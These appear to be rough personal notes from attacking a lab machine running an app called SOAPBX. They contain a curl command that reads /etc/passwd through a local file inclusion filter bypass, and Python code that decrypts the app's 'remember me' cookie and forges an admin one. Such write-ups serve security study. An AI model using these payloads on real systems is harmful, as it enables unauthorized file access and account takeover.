Application called SOAPBX
Create new account and then you can perform LFI to retrieve various files such as instanceid and apikey
Local File inclusion bypassing the basic filter available in the /download node which replaces ../ with a blank space
curl --path-as-is -i -s -k -X $'GET' \\
-H $'Host: 192.168.181.155' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'DNT: 1' -H $'Sec-GPC: 1' -H $'Connection: keep-alive' -H $'Referer: <http://192.168.181.155/story/2>' -H $'Upgrade-Insecure-Requests: 1' -H $'Priority: u=0, i' \\
-b $'JSESSIONID=FBC9ED4617C48911934D754A53708BC6; rememberme=test1.0n1OFRIlXGX2UVL84XNhiliSx-dysALbbwKQaobnyrCVA9uY_cZPh5rjX2zy0BFhZaa87vjSKPCluxSgUITNASnZIDn1MJ_2' \\
$'<http://192.168.181.155/download?id=....//....//....//....//....//....//....//etc/passwd>'
The API doesn’t seem to have any endpoint worth exploiting based on config
instanceid looks juicy
There is a class called encryptUtil.class that takes the user, token and salt it is used in the remembermetoken where it creates a hashcode
Developer missed an i on isValidRememberMe and getIdFromRememberMe making the code vulnerable to recreation of a cookie
Almost working
from pyDes import *
import hashlib
import base64
cookie = '''test1.dJChkI5W84WWOOccIMIxwepftFzpOi9TSrxqpFB7yaOFcoOd8AWAEJdvy3UKM2pmZU93EqCnktiQKAqzZJ8KnCnZIDn1MJ_2'''
keytext =''
#raw_data = 'cWen1JuUM4LLNfi-6DXqlAVC4E8AeMW7-VtbKanfqQprsgPNl9Cn6F3MUKOXbS4F82m-y9BimG131KA5V7CKhinZIDn1MJ_2'
raw_data = 'FmQsU5ZO13El-p1hMbJ3kom2MxGMesH_iuNkeW5RnJ54QW6ruQ_bwavIeMEAcdgwC586GYUvI7gNDCoTGIEpuinZIDn1MJ_2'
b64_data = base64.urlsafe_b64decode(raw_data)
print(b64_data)
user_email = f"[email protected]"
salt = f"8603f3be-f597-48b1-be2c-ff95236fc029"
keytext = (salt + user_email).encode('utf-8')
print(keytext)
key = hashlib.sha512(keytext).digest()[:24]
print(key)
enc = triple_des(key=key,mode=ECB)
raw_cookie = enc.decrypt(data=b64_data,pad=None,padmode=PAD_PKCS5).decode('utf-8').split('|')[0]
print(raw_cookie)
# forge
admin_email="[email protected]"
admin_username="admin"
admin_keytext=(salt + admin_email).encode('utf-8')
print('admin_keytext',admin_keytext)
admin_key = hashlib.sha512(admin_keytext).digest()[:24]
print('admin_key',admin_key)
cookie_str= raw_cookie + '|1'
print('cookie_str', cookie_str)
alg = triple_des(key=admin_key,mode=ECB,pad=None)
admin_cookie = base64.urlsafe_b64encode(alg.encrypt(data=cookie_str,padmode=PAD_PKCS5))
print(admin_cookie)
working on this
from pyDes import *
import hashlib as hl
import base64 as b64
import requests as r
def new_account():
target='192.168.181.155'
endpoint= 'http://' + target + '/signup'
email ='[email protected]'
passwd = 'password123'
username = 'hackerman'
data = {
'email': email,
'username':username,
'password':passwd,
'submit':'Submit'
}
response = r.post(endpoint,data=data)
print(response.text)
def login_new():
target = '192.168.181.155'
endpoint = 'http://' + target + '/login'
username = 'hackerman'
passwd = 'password123'
data = {
'username': username,
'password': passwd,
'rememberme': 'true',
'submit': 'Submit'
}
response = r.post(endpoint,data=data)
print(response.text)
cookies = response.cookies
for cookie in cookies:
print(cookie.name, cookie.value)
def create_key(email,uuid):
keytext = (uuid + email).encode('utf-8')
key = hl.sha512(keytext).digest()[:24]
print(key)
return key
def raw_cookie(cookie,key):
b64data = b64.urlsafe_b64decode(cookie)
encryption = triple_des(key=key,mode=ECB)
raw_cookie = encryption.decrypt(data=b64data,pad=None,padmode=PAD_PKCS5).decode('utf-8').split('|')[0]
print(raw_cookie)
return raw_cookie
def admin_cookie(raw_cookie,):
cookie=''
def main():
#new_account() #this works
login_new()
#email=''
#uuid=''
#key=create_key()
#raw_cookie('',key)
if __name__ == "__main__":
main()